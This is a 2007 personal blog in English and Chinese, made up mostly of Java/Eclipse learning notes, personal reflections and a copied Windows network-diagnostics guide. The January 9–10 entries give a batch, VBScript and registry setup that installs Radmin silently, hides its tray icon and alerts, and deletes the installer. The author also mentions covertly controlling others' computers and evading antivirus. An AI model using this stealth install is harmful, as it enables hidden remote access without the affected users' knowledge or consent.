Make progress is the topic for ever...

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It's a fans of computer/ Computer is my favorite/ Making progress is the topic for ever...

Wednesday, January 31, 2007

No subject

One picture of seaside.
No one will real to you,unless yourself.
Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Tuesday, January 30, 2007

About data type

memroom           type           name               dataRang                    eg.
8bits                  byte            byte                -2(7)...2(7)-1                byte b=127
16bits                short           shortInt           -2(15)...2(15)-1             int i=111
32bits                int               int                  -2(31)...2(31)-1             short s=234
64bits                long            longInt            -2(63)...2(63)-1              long a 323
32bits                float            float                 1.4e-45...3.4e+38         long b=33231121
64bits                double         double            4.9e-324...1.7e+308     long c=0x0a4d

Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Monday, January 29, 2007

A little dos acknowladge



  打开附件中的记事本,然后在里边写入,at 22:00 shutdown -s -f,然后选择"文件→保存",保存类型选择"所有文件",然后将其命名为:shutdown.bat,如图1所示。如果你希望每天都在晚上十点关机,则将这个文件拖动到"开始→程序→启动"中,这样每次开机该文件都将被执行,其具体含义是,at 22:00在每天十点,shutdown -s -f关机且关闭所有未响应程序。


  @echo off
  %systemroot%\system32\shutdown -r -t 0

运行shutdown.exe -s -f -t xx(xx是指距自动关机还有多少秒)


Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Friday, January 26, 2007


double num;
Double num;
If you write the program as the third line,it will appear error.
found : double
required: java.lang.Double

Double num1,num2,product;//double num1,num2,product;


Right or wrong decide by yourself, praise or blame listen to the others;
gain or loss placid as usual, success or failure return to the zero.

Wednesday, January 24, 2007

Eclipse Working Sets

Eclipse 工作集的用途
今天的主题是Working Sets。

我们知道Eclipse是通过工作空间(Workspace)来管理多个项目的,同时Eclipse的3.0版本都可以支持多个工作空间并存,但是在切换工作空间的时候是需要重新启动Eclipse的(自动),重启的过程可能比较慢,所以我会把所有的项目放在同一个工作空间中,这样带来的问题就是资源的导航视图(Navigator或者Package Explorer)中项目太多,从而使整个开发环境看起来比较混乱。



每当我们做了一项调查,我们发现越来越少的java开发者严格地使用command-line/text-editor(命令行/文本编辑器)方式. 绝大多数都采用了IDE(集成开发环境), 而且大部分选择了Eclipse.设想一下,你乐意用IDE生成代码,而又不得不用命令行来编译? 答案当然是否定的.

Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Tuesday, January 23, 2007

A short key to the Eclipse edition

Can move the line to the line you want it to ! It's a simple way to programming in the eclipse

Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Monday, January 22, 2007

Don't think more of the simple things

Something i can't understand,not for it 's complex,but for it's simple.Because i think more for the things but it has less of the mean.

Before yesterday:
Java实时运算簿页面(Java Scrapbook Page)
写程序时可能会些其它的想法,但不知是否可行:多数情况是直接写到程序再来debug,或是另外写各小程序。Eclipse提供一种轻巧的替代方式,Java实时运算簿页面(Java Scrapbook Page),藉由渐进式编译器,可以在实时运算簿写入任意的Java程序代码并执行,不需另写在类别或方法中。
It's a short way to debug the small application fragment especially when you do a big project.
With it ,you will get more convenient,but not to write a new project to debug it.
Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Saturday, January 20, 2007

A little experience

A little programming experience
Don't see higher,but can't do the lower.Maybe the centense is not correct,But i think the mean i want to express is clear.
If you can not do it easily,you can not think you can do it .This is the experience and the acknowladge.
The small question can explain the above:
Write a program,init variable n=5814,and use the division and mod (%) to print every number of n like this:
The digits of n are 5,8,1,4
Although it is a small program,and the most basic question.But i can not do solve it though i learn the Java for a long time.
As the simple answer,write the solvation:
System.out.println (n/100);
Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Friday, January 19, 2007

Solve the question of (x)arguments

More ,I find a new way to solve question.
One person can concentrate one's attention to do a thing for two hours,one day,or two days in the most conditions.But if he can't insist it,it will be lost in the future.However if you insist it or think of it continue,the mind will be wild.So,we should find a new way to solve the question.
Concentrate your attention to do it,and stop,but not throw away.Some time later,pick up it,and do it again.The gold will not help you if you don't help yourself.
ant .xml 有关
public class Hello{
public static void main(String[] args){
for(int i=0;i<args.length;i++){
System.out.println ("args["+i+"]is:"+args[i]);
Eclipse 3.2
please input the value 这个问题还是没有搞明白的.
01.18把这个问题解决了.其实有很多问题并不像想像中的那么难,往往在一段时间内,也可能是因为思考问题钻牛角尖造成的.有许多问题不一定都可能在一段你专心的时间内解决掉的,也可能在搁置一段时间以后,但有一个前提,就是不能忘记 ,只要再重新认真思考思考就能解决.
其实解决的办法很简单,只不过在(x)arguments中输入1 12 123 1234 类似这样的参数就可以了.
Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Wednesday, January 17, 2007

Solve a small question

Find a new way to debug the appliation step by step.The icon like this:
Do it like this,I can check each step error but not make breakpoint every row.The shortkey is f5. Although it's easy,but it can solve a big question.
Eclipse Debug界面上的resume按钮的右边就是这个step按钮.

Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Tuesday, January 16, 2007

A program can't solve

-<init>(), bci=109

- javax.microedition.lcdui.Image.createImage(), bci=10

- com.linuks.demo.PasswordManagerMidlet.<init>(), bci=48

- java.lang.Class.newInstance(), bci=0

- javax.microedition.midlet.Main.main(), bci=83

This is a exception of the project "PasswordManager" software on the mobile.It's a finished project already.But i want to improve it in my way.There has no images in the software.I want to add some pics to improve the software's interface.
The centense like this:
try {
} catch (IOException e) {
lstMain.append("Add", addImage);
But it will appear the exception above.Be busy doing it the whole day,has no result.
Get the inclusion,maybe the pics path was error.

Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Sunday, January 14, 2007

Girl friend

Since the last girl friend,i have no one till now.Sometime,it's a little unconvenice to have a girl friend after the back.But,it's a neccessary to have one in the whole.So i want to have one recently.Not only the psychology,but alse the physiology.
The day before yesterday,a aunt introduce a girl to me.But i have nothing to say for the introdution.Sometimes,i couldn't admit the acknowledge of make friend with female.
Have to learn from now on...
net comand:under windows 2000 cmd shell
Input netsh,appear netsh>
Input int ip, appear interface ip>
Input dump,appear
# ----------------------------------

  # Interface IP Configuration

  # ----------------------------------

  pushd interface ip

  # Interface IP Configuration for "Local Area Connection"

  set address name = "Local Area Connection" source = static addr =

  mask =

  add address name = "Local Area Connection" addr = mask =

  set address name = "Local Area Connection" gateway = gwmetric = 1

  set dns name = "Local Area Connection" source = static addr =

  set wins name = "Local Area Connection" source = static addr = none


  # End of interface IP configuration
So,we can input the command bellow to change the IP:
"netsh interface ip add address "Local Area Connection""
If you can't remember the command of the set ip in dos,you can input the "?" after the interface ip>
使用 ipconfig /all 查看配置

  使用 ipconfig /renew 刷新配置

  使用 ipconfig 管理 DNS 和 DHCP 类别 ID

  使用 Ping 测试连接

  使用 Arp 解决硬件地址问题

  使用 nbtstat 解决 NetBIOS 名称问题

  使用 netstat 显示连接统计

  使用 tracert 跟踪网络连接

  使用 pathping 测试路由器

  使用 ipconfig /all 查看配置

ping IP_address

  使用 Ping 时应该执行以下步骤:

  Ping 环回地址验证是否在本地计算机上安装 TCP/IP 以及配置是否正确。


  Ping 本地计算机的 IP 地址验证是否正确地添加到网络。

  ping IP_address_of_local_host

  Ping 默认网关的 IP 地址验证默认网关是否运行以及能否与本地网络上的本地主机通讯。

  ping IP_address_of_default_gateway

  Ping 远程主机的 IP 地址验证能否通过路由器通讯。

  ping IP_address_of_remote_host

  Ping 命令用 Windows 套接字样式的名称解析将计算机名解析成 IP 地址,所以如果用地址成功,但是用名称 Ping 失败,则问题出在地址或名称解析上,而不是网络连通性的问题。详细信息,请参阅使用 Arp 解决硬件地址问题。

  如果在任何点上都无法成功地使用 Ping,请确认:

  安装和配置 TCP/IP 之后重新启动计算机。

  "Internet 协议 (TCP/IP) 属性"对话框"常规"选项卡上的本地计算机的 IP 地址有效而且正确。

  启用 IP 路由,并且路由器之间的链路是可用的。

  您可以使用 Ping 命令的不同选项来指定要使用的数据包大小、要发送多少数据包、是否记录用过的路由、要使用的生存时间 (TTL) 值以及是否设置"不分段"标志。可以键入 ping -? 查看这些选项。

  下例说明如何向 IP 地址 发送两个 Ping,每个都是 1,450 字节:

  C:\>ping -n 2 -l 1450

  Pinging with 1450 bytes of data:

  Reply from time<10ms TTL=32

  Reply from time<10ms TTL=32

  Ping statistics for :

  Packets:Sent = 2, Received = 2, Lost = 0 (0% loss),

  Approximate roundtrip times in milli-seconds:

  Minimum = 0ms, Maximum = 10ms, Average = 2ms

  默认情况下,在显示"请求超时"之前,Ping 等待 1,000 毫秒(1 秒)的时间让每个响应返回。如果通过 Ping 探测的远程系统经过长时间延迟的链路,如卫星链路,则响应可能会花更长的时间才能返回。可以使用 -w (等待)选项指定更长时间的超时。

  使用 Arp 解决硬件地址问题

  "地址解析协议 (ARP)"允许主机查找同一物理网络上的主机的媒体访问控制地址,如果给出后者的 IP 地址。为使 ARP 更加有效,每个计算机缓存 IP 到媒体访问控制地址映射消除重复的 ARP 广播请求。

  可以使用 arp 命令查看和修改本地计算机上的 ARP 表项。arp 命令对于查看 ARP 缓存和解决地址解析问题非常有用。

  详细信息,请参阅查看"地址解析协议 (ARP)"缓存和添加静态 ARP 缓存项目。

  使用 nbtstat 解决 NetBIOS 名称问题

  TCP/IP 上的 NetBIOS (NetBT) 将 NetBIOS 名称解析成 IP 地址。TCP/IP 为 NetBIOS 名称解析提供了很多选项,包括本地缓存搜索、WINS 服务器查询、广播、DNS 服务器查询以及 Lmhosts 和主机文件搜索。

  Nbtstat 是解决 NetBIOS 名称解析问题的有用工具。可以使用nbtstat 命令删除或更正预加载的项目:

  nbtstat -n 显示由服务器或重定向器之类的程序在系统上本地注册的名称。

  nbtstat -c 显示 NetBIOS 名称缓存,包含其他计算机的名称对地址映射。

  nbtstat -R 清除名称缓存,然后从 Lmhosts 文件重新加载。

  nbtstat -RR 释放在 WINS 服务器上注册的 NetBIOS 名称,然后刷新它们的注册。

  nbtstat -a name 对 name 指定的计算机执行 NetBIOS 适配器状态命令。适配器状态命令将返回计算机的本地 NetBIOS 名称表,以及适配器的媒体访问控制地址。

  nbtstat -S 列出当前的 NetBIOS 会话及其状态(包括统计),如下例所示:

  NetBIOS connection table

  Local name State In/out Remote Host Input Output


  CORP1 <00> Connected Out CORPSUP1<20> 6MB 5MB

  CORP1 <00> Connected Out CORPPRINT<20> 108KB 116KB

  CORP1 <00> Connected Out CORPSRC1<20> 299KB 19KB

  CORP1 <00> Connected Out CORPEMAIL1<20> 324KB 19KB

  CORP1 <03> Listening

  使用 netstat 显示连接统计

  可以使用 netstat 命令显示协议统计信息和当前的 TCP/IP 连接。netstat -a 命令将显示所有连接,而 netstat -r 显示路由表和活动连接。netstat -e 命令将显示Ethernet 统计信息,而 netstat -s 显示每个协议的统计信息。如果使用 netstat -n,则不能将地址和端口号转换成名称。下面是 netstat 的输出示例:

  C:\>netstat -e

  Interface Statistics

  Received Sent

  Bytes 3995837940 47224622

  Unicast packets 120099 131015

  Non-unicast packets 7579544 3823

  Discards 0 0

  Errors 0 0

  Unknown protocols 363054211

  C:\>netstat -a

  Active Connections

  Proto Local Address Foreign Address State









  UDP CORP1:1025 *:*

  UDP CORP1:snmp *:*

  UDP CORP1:nbname *:*

  UDP CORP1:nbdatagram *:*

  UDP CORP1:nbname *:*

  UDP CORP1:nbdatagram *:*

  C:\>netstat -s

  IP Statistics

  Packets Received = 5378528

  Received Header Errors = 738854

  Received Address Errors = 23150

  Datagrams Forwarded = 0

  Unknown Protocols Received = 0

  Received Packets Discarded = 0

  Received Packets Delivered = 4616524

  Output Requests = 132702

  Routing Discards = 157

  Discarded Output Packets = 0

  Output Packet No Route = 0

  Reassembly Required = 0

  Reassembly Successful = 0

  Reassembly Failures =

  Datagrams Successfully Fragmented = 0

  Datagrams Failing Fragmentation = 0

  Fragments Created = 0

  ICMP Statistics

  Received Sent

  Messages 693 4

  Errors 0 0

  Destination Unreachable 685 0

  Time Exceeded 0 0

  Parameter Problems 0 0

  Source Quenches 0 0

  Redirects 0 0

  Echoes 4 0

  Echo Replies 0 4

  Timestamps 0 0

  Timestamp Replies 0 0

  Address Masks 0 0

  Address Mask Replies 0 0

  TCP Statistics

  Active Opens = 597

  Passive Opens = 135

  Failed Connection Attempts = 107

  Reset Connections = 91

  Current Connections = 8

  Segments Received = 106770

  Segments Sent = 118431

  Segments Retransmitted = 461

  UDP Statistics

  Datagrams Received = 4157136

  No Ports = 351928

  Receive Errors = 2

  Datagrams Sent = 13809

  使用 tracert 跟踪网络连接

  Tracert(跟踪路由)是路由跟踪实用程序,用于确定 IP 数据报访问目标所采取的路径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。

  Tracert 工作原理

  通过向目标发送不同 IP 生存时间 (TTL) 值的"Internet 控制消息协议 (ICMP)"回应数据包,    Tracert 诊断程序确定到目标所采取的路由。要求路径上的每个路由器在转发数据包之前至少将数据包上的 TTL 递减 1。数据包上的 TTL 减为 0 时,路由器应该将"ICMP 已超时"的消息发回源系统。

  Tracert 先发送 TTL 为 1 的回应数据包,并在随后的每次发送过程将 TTL 递增 1,直到目标响应或 TTL 达到最大值,从而确定路由。通过检查中间路由器发回的"ICMP 已超时"的消息确定路由。某些路由器不经询问直接丢弃 TTL 过期的数据包,这在Tracert 实用程序中看不到。

  Tracert 命令按顺序打印出返回"ICMP 已超时"消息的路径中的近端路由器接口列表。如果使用 -d 选项,则 Tracert 实用程序不在每个 IP 地址上查询 DNS。

  在下例中,数据包必须通过两个路由器(才能到达主机172.16.0.99 。主机的默认网关是, 网络上的路由器的 IP地址是

  C:\>tracert -d

  Tracing route to over a maximum of 30 hops

  1 2s 3s 2s 10,0.0,1

  2 75 ms 83 ms 88 ms

  3 73 ms 79 ms 93 ms

  Trace complete.

  用 tracert 解决问题

  可以使用 tracert 命令确定数据包在网络上的停止位置。下例中,默认网关确定 主机没有有效路径。这可能是路由器配置的问题,或者是 网络不存在(错误的 IP 地址)。


  Tracing route to over a maximum of 30 hops

  1 reportsestination net unreachable.

  Trace complete.

  Tracert 实用程序对于解决大网络问题非常有用,此时可以采取几条路径到达同一个点。

  Tracert 命令行选项

  Tracert 命令支持多种选项,如下表所示。

  tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

  选项 描述

  -d 指定不将 IP 地址解析到主机名称。

  -h maximum_hops 指定跃点数以跟踪到称为 target_name 的主机的路由。

  -j host-list 指定 Tracert 实用程序数据包所采用路径中的路由器接口列表。

  -w timeout 等待 timeout 为每次回复所指定的毫秒数。

  target_name 目标主机的名称或 IP地址。

  详细信息,请参阅使用 tracert 命令跟踪路径。

  使用 pathping 测试路由器

  pathping 命令是一个路由跟踪工具,它将 ping 和 tracert 命令的功能和这两个工具所不提供的其他信息结合起来。pathping 命令在一段时间内将数据包发送到到达最终目标的路径上的每个路由器,然后基于数据包的计算机结果从每个跃点返回。由于命令显示数据包在任何给定路由器或链接上丢失的程度,因此可以很容易地确定可能导致网络问题的路由器或链接。某些选项是可用的,如下表所示。

  选项 名称 功能

  -n Hostnames 不将地址解析成主机名。

  -h Maximum hops 搜索目标的最大跃点数。

  -g Host-list 沿着路由列表释放源路由。

  -p Period 在 ping 之间等待的毫秒数。

  -q Num_queries 每个跃点的查询数。

  -w Time-out 为每次回复所等待的毫秒数。

  -T Layer 2 tag 将第 2 层优先级标记(例如,对于 IEEE 802.1p)连接到数据包并将它发送到路径中的每个网络设备。这有助于标识没有正确配置第 2 层优先级的网络设备。-T 开关用于测试服务质量 (QoS) 连通性。

  -R RSVP isbase Che检查以确定路径中的每个路由器是否支持"资源保留协议 (RSVP)",此协议允许主机为数据流保留一定量的带宽。 -R 开关用于测试服务质量 (QoS) 连通性。

  默认的跃点数是 30,并且超时前的默认等待时间是 3 秒。默认时间是 250 毫秒,并且沿着路径对每个路由器进行查询的次数是 100。

  以下是典型的 pathping 报告。跃点列表后所编辑的统计信息表明在每个独立路由器上数据包丢失的情况。

  D:\>pathping -n msw

  Tracing route to msw []

  over a maximum of 30 hops:







  Computing statistics for 125 seconds...

  Source to Here This Node/Link

  Hop RTT Lost/Sent = Pct Lost/Sent = Pct Address


  0/ 100 = 0% |

  1 41ms 0/ 100 = 0% 0/ 100 = 0% 100 = 13% |

  2 22ms 16/ 100 = 16% 3/ 100 = 3% 100 = 0% |

  3 24ms 13/ 100 = 13% 0/ 100 = 0% 0/ 100 = 0% |

  4 21ms 14/ 100 = 14% 1/ 100 = 1% 0/ 100 = 0% |

  5 24ms 13/ 100 = 13% 0/ 100 = 0%

  Trace complete.

  当运行 pathping 时,在测试问题时首先查看路由的结果。此路径与 tracert 命令所显示的路径相同。然后 pathping 命令对下一个 125 毫秒显示忙消息(此时间根据跃点计数变化)。在此期间,pathping 从以前列出的所有路由器和它们之间的链接之间收集信息。在此期间结束时,它显示测试结果。

  最右边的两栏 This Node/Link Lost/Sent=Pct 和 Address 包含的信息最有用。跃点 1)和跃点 2)丢失 13% 的数据包。 所有其他链接工作正常。在跃点 2 和 4 中的路由器也丢失寻址到它们的数据包(如 This Node /Link 栏中所示),但是该丢失不会影响转发的路径。

  对链接显示的丢失率(在最右边的栏中标记为 |)表明沿路径转发丢失的数据包。该丢失表明链接阻塞。对路由器显示的丢失率(通过最右边栏中的 IP 地址显示)表明这些路由器的 CPU 可能超负荷运行。这些阻塞的路由器可能也是端对端问题的一个因素,尤其是在软件路由器转发数据包时。

Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Thursday, January 11, 2007

pitiful salary

The second day after the salary sent,I don't want to consume it at once.From the job i took,had accumlated noting in the ecomic.Recall the wish i had since graduated from the campus.I want to buy a notebook computer by the accumlation in one year.But,by now ,accumlate nothing.Buy what ,nothing else.
Yesterday:I like Eclipse,and use Eclipse,begain to find the value of Eclipse.里有的好东西真是不少。
  以Task View为例,刚开始的时候没怎么注意它,更多的时候是关掉,From the Internet,发现它竟然可以将Java代码里的一些具有关键字的行内容抽取出来.DIdn 't know what is it doing.But这可是一个好东西啊,它完全可以令程序员在代码是加入自己的书签。按我自己以往的computer习惯and acknowlage,发现一个重要点、修改点之类的,一般会用Eclipse的Bookmark功能将它们记录起来,但这有一个问题:这些Bookmark无法与其它人进行共享。而Task View正好可以解决这个问题,你可以在需要标记的地方加上Task View的关键字(这些关键字均可自定义,也可定义优先级),一旦加上Task View中的关键字,你就可以从Task View找到这些已标记的地方,也可以快速跳转到这些地方,最大的好处就是这个标签可以直接添加在代码上,在绝不影响代码功能的前提下,将你的标签信息通过代码传递给其它的开发者。
  如果同一团队里的开发者都使用同一套Task Tag来标记不同种类的信息,那么就可以将更加多的信息聚集到代码上,可以很大程度上减少因为代码与文档分离所产生的各种问题。
      Although it's a small acknowlage of the eclipse application,but i found it will take much conveniention for programing by the eclipse.

Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Wednesday, January 10, 2007

Do a thing one day

Don't afraid busying the whole day.It's enough ,s long as do a real thing one day.
Do it in heart,think of it in heart,and harve it in heart.
It's enough making progress little every day.
And from now on,record the little progress on my blog.
yestoday,Installed the radmin server on my computer,and find that the radmin server's the last version is v3.0 beta2 without license.
More,i find that there is only the v2.1 can escape from the virue protect software.
Stop doing it from now on,and it's only an amateur hobby.
Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Tuesday, January 09, 2007

Install radmin for the computer

I like remote-ctrol,since i touch the computer.Because it will produce the feeling of hack.
At the begainning,use the BinHe to control the neignboring computer in the Internet cafe.Like the feeling to control others without their attention.More,to pursuse the technology of Internet.
Today,I want to install a radmin for the computer in the hospital.The goal is that to decrease degree of the difficulty in the job:
All files:Admdll.dll,raddrv.dll ,r_server.exe(These are the neccessory file of the server),install.bat,system.reg,r_server.vbs(These are the file I wrote.)
Introduce the content of the file i wrote.
@echo off //Disable show command to user
regedit /s system.reg //The set of the r_server.exe's registry
r_server /install
r_server /pass:******* /s
r_server /save /s
r_server /silence //Disable the alert
r_server /start
del system.reg
del r_server.vbs
del install.bat
r_server.vbs:  //Use it to remove the black window of the cmd
Set ws=CreateObject("Wscript.Shell") "cmd /c install.bat",vbhide
Windows Registry Editor Version 5.00





"DisableTrayIcon"=hex:01,00,00,00 //Disable the icon in the taskbar

Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Sunday, January 07, 2007

Repair the computer for others

Repair the computer for some people.Early in the morning 9:00,I get up to go other's home,and received cheerful by the owner.
With the owner go to the computer shop.After 2 hours,the technology person help us install a new OS.But the job they doing is what i can't bear:machinery,repeat.Having nothing technology.At last,had a good meal with the owner.
Although it is some little helpful for some body,and it's cheerful for me to help others,I have little sorrow for the wor content I have done.I don't like the technology with little technique.I like programming i often say,but I does not like what Ipretends to like.So,sometimes i hate myself,hypocritical.

Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

Saturday, January 06, 2007

An error of the fomart document

return "PasswordID:"+idView+"Password"+pwdView+"Remark"+remarkView;
return "PasswordID:" + idView + "Password" + pwdView+ "Remark" + remarkView;

Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

try again...

try again...

Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

mail-to-blogger,hava a try...

mail-to-blogger,hava a try...

Thursday, January 04, 2007

The Capital of ming.

The Capital of ming.

The local home of the ming. Some time, I will be sorrowful for the elapse of the history dynasty. Not for the miserable, but for the long history river’s cold-blooded. No mater how strong , how contributed of the dynasty, didn’t escape from the elapsing river at last.

I’m a person, small, and unwell-known. Not worth mentioning relative the long history. But I was great in my feeling, don’t know where it comes from.


Tuesday, January 02, 2007

A Long Centense

Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.
